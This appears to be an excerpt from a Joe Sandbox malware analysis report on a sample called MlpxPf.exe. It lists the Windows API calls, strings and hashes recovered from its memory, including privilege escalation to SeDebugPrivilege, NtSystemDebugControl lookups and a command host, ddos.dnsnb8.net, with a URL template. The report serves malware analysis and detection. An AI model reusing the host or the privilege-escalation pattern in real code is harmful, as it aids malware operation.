                                    • GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76C08400,http://%s:%d/%s/%s,?,?,?,00591118), ref: 00591867
                                    • srand.MSVCRT ref: 00591878
                                    • rand.MSVCRT ref: 00591880
                                    • srand.MSVCRT ref: 00591890
                                    • rand.MSVCRT ref: 00591894
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: Timerandsrand$FileSystem
                                    • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                                    • API String ID: 4106363736-3273462101
                                    • Opcode ID: 858c64bf275c29b6a1b2b1b1a74ba589bcda6ab5372ad303dd8baa58e8cf43af
                                    • Instruction ID: 965c9a42c0e64a64d22e0370f0171c3667e6311d182e6d76e26b053adcf8f8d8
                                    • Opcode Fuzzy Hash: 858c64bf275c29b6a1b2b1b1a74ba589bcda6ab5372ad303dd8baa58e8cf43af
                                    • Instruction Fuzzy Hash: 8DE04877A10218FBD700A7F9EC4A99EBBACDE84161B110567F600D3254E575FE488AB4
                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7556E800,?,?,005929DB,?,00000001), ref: 005926A7
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,7556E800,?,?,005929DB,?,00000001), ref: 005926B5
                                    • lstrlen.KERNEL32(?), ref: 005926C4
                                    • ??2@YAPAXI@Z.MSVCRT ref: 005926CE
                                    • lstrcpy.KERNEL32(00000004,?), ref: 005926E3
                                    • lstrcpy.KERNEL32(?,00000004), ref: 0059271F
                                    • ??3@YAXPAX@Z.MSVCRT ref: 0059272D
                                    • SetEvent.KERNEL32 ref: 0059273C
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                                    • String ID:
                                    • API String ID: 41106472-0
                                    • Opcode ID: c8ba80796a48aa709625fd7a06092d4ee7f510079c325713a9beff7fbb01e840
                                    • Instruction ID: 16ced4bf189944ceb1ac35a1a7715498fa7556d1dfae17b9e3ac62cc5e80e4ba
                                    • Opcode Fuzzy Hash: c8ba80796a48aa709625fd7a06092d4ee7f510079c325713a9beff7fbb01e840
                                    • Instruction Fuzzy Hash: 7A11793A501204FFCB319F94ED48C6A7FA9FBA4761B164017F85897120D7308D8AEF50
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: lstrcatmemcpymemsetrandsrand
                                    • String ID: .exe
                                    • API String ID: 122620767-4119554291
                                    • Opcode ID: b502151da8a2270250baeb6b0a56d17a09c471ea2e111b5889508ac318d6f645
                                    • Instruction ID: a71299689dd759911ee21ffa65911a76ffbd0a04d9a8a046371828a279fc7374
                                    • Opcode Fuzzy Hash: b502151da8a2270250baeb6b0a56d17a09c471ea2e111b5889508ac318d6f645
                                    • Instruction Fuzzy Hash: 4E21BB26E447B1AEDB2613356C45F6D3F46EFF3720F1B409AF4810B192D1640E8B9768
                                    APIs
                                    • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 005913BC
                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 005913DA
                                    • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00591448
                                      • Part of subcall function 0059119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\MlpxPf.exe,?,?,?,?,?,?,005913EF), ref: 005911AB
                                      • Part of subcall function 0059119F: OpenProcessToken.ADVAPI32(00000000,00000028,005913EF,?,?,?,?,?,?,005913EF), ref: 005911BB
                                      • Part of subcall function 0059119F: AdjustTokenPrivileges.ADVAPI32(005913EF,00000000,?,00000010,00000000,00000000), ref: 005911EB
                                      • Part of subcall function 0059119F: CloseHandle.KERNEL32(005913EF), ref: 005911FA
                                      • Part of subcall function 0059119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,005913EF), ref: 00591203
                                    Strings
                                    • SeDebugPrivilege, xrefs: 005913D3
                                    • C:\Users\user\AppData\Local\Temp\MlpxPf.exe, xrefs: 005913A8
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                                    • String ID: C:\Users\user\AppData\Local\Temp\MlpxPf.exe$SeDebugPrivilege
                                    • API String ID: 4123949106-1990086918
                                    • Opcode ID: 58bb43f85b96ae1811b5453d50bbceedbed44affe4d34933b45d7e261a4dd005
                                    • Instruction ID: 5ca1c1b797fc2cf5a7879db1ce5605ca6e0becf39b418eae306576aadcadb911
                                    • Opcode Fuzzy Hash: 58bb43f85b96ae1811b5453d50bbceedbed44affe4d34933b45d7e261a4dd005
                                    • Instruction Fuzzy Hash: 5E314075D0062BEAEF209BA58D49FEEBFB8FB88744F10446AE505B2141D730AE45CB64
                                    APIs
                                    • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00591334
                                    • GetProcAddress.KERNEL32(00000000), ref: 0059133B
                                    • memset.MSVCRT ref: 00591359
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: AddressHandleModuleProcmemset
                                    • String ID: NtSystemDebugControl$ntdll.dll
                                    • API String ID: 3137504439-2438149413
                                    • Opcode ID: 1e75068ff5dafeaf2611f5abe2bb4d00e575cb6c651d100a8c0705857e016bfd
                                    • Instruction ID: 53bd061e05c581c2988a378caa4e16d922146b0c9fd075d962a768433d159a38
                                    • Opcode Fuzzy Hash: 1e75068ff5dafeaf2611f5abe2bb4d00e575cb6c651d100a8c0705857e016bfd
                                    • Instruction Fuzzy Hash: 27016D7160071AFFDF10DFA4AC89D6FBFB8FB51318F00492AF902A2150E2708A19DA55
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: strrchr$lstrcmpilstrcpylstrlen
                                    • String ID:
                                    • API String ID: 3636361484-0
                                    • Opcode ID: 73f242ec2e04c53f567ce73958641bda23682dd9af8e851a02c88b9675d4d647
                                    • Instruction ID: d951e33626b1384c9b4525a1108ac05ba179a397adcdfbbd86ec58560b715861
                                    • Opcode Fuzzy Hash: 73f242ec2e04c53f567ce73958641bda23682dd9af8e851a02c88b9675d4d647
                                    • Instruction Fuzzy Hash: 2101FE72904226AFDF105760DC4DFE67FDCFB14350F050067D945D3090E6749E898B94
                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0059603C
                                    • GetProcAddress.KERNEL32(00000000,00596064), ref: 0059604F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: kernel32.dll
                                    • API String ID: 1646373207-1793498882
                                    • Opcode ID: 335329871ecbef117560c581236496d2564772eb3f9c327adcab12014dd01edb
                                    • Instruction ID: 47cdfe37bb09df6bfe19a02511365d22972be7385e956bd6f2b590bd1e468a94
                                    • Opcode Fuzzy Hash: 335329871ecbef117560c581236496d2564772eb3f9c327adcab12014dd01edb
                                    • Instruction Fuzzy Hash: 7FF0F0B11402998FEF708FA4CC88BDE3BE4FB05700F50042AEA0DCB281DB3486098B28